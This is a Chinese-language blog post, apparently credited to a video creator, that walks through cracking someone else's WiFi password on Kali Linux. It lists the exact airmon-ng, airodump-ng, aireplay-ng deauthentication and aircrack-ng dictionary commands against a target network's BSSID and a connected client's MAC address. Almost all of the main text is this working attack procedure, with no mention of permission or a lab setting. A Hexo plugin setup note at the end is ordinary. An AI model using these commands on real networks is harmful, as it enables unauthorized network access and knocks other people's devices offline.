Kali-Brute-Force-Wifi-1

Kali 暴力破解 Wifi 密码

源视频的博主:鳞零苓

前期准备

  1. Kali 系统需要配置无线网卡驱动,如果 Kali 不支持你的无线网卡,你需要自行找到 kali 系统的 驱动打上去。

  2. 准备一个强力的 密码字典

操作

1、查看你的无线网卡是否启用

1
ifconfig

2、查看网卡是否支持监听功能

1
airmon-ng

3、打卡监听模式

1
airmon-ng start wlan0

4、查看监听网卡名称

1
ifconfig

5、扫描 Wifi 信号

1
airodump-ng wlan0mon

注:
我们以 CMCC-L8TF 为例,我们需要记录两个信息 BSSID 与 CH
BSSID:为 Wifi 的 MAC号
CH:为 Wifi 的频段

6、进行抓包

1
airodump-ng -c 1 --bssid 6C:06:D6:58:83:00 -w /home/kali/桌面/handshake  wlan0mon

注:
-c 后面是 Wifi 的频段
–bssid 后面 是 Wifi 的 MAC 号
-w 后面跟文件路径,即抓包的数据日志

这种抓包方式比较被动,只有等设备完成认证才能抓到握手包

7、使用 ACK 攻击,将设备下线,然后就可以抓到正确的包(第六步的抓包窗口不能关闭)

1
aireplay-ng -0 10 -a 6C:06:D6:58:83:00 -c 9A:66:B7:56:5C:E7 wlan0mon

注:
-0:表示通知设备断开连接
10:表示攻击 10 次
-a:后面跟的是要破解的 Wifi 的 MAC 号
-c:表示要踢下线的设备,就是我们抓包的那个终端显示的 MAC 地址

8、 ACK 攻击完成后,关闭 (第六步)抓包命令

这个时候会在你抓包命令配置的路径生成 5 个文件,需要用的是下面的 Cap 文件

9、暴力破解的过程(使用密码字典)

1
aircrack-ng -w /home/kali/桌面/字典.txt -b 6C:06:D6:58:83:00 /home/kali/桌面/handshake-01.cap

注:
-w:后面跟的是密码字典,
-b:后面跟的是 WIFI 的 MAC 号,
最后跟的是 之前的抓包的 CAP 文件

等待暴力破解,如果字典中有 Wifi 的密码 那么 Wifi 的密码一定可以破解。

10、其他说明

密码破解完成不代表着可以连接,如果对方路由器绑定了 连接设备的 MAC 地址那么就算密码被破解了,也不能连上该 Wifi。

谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true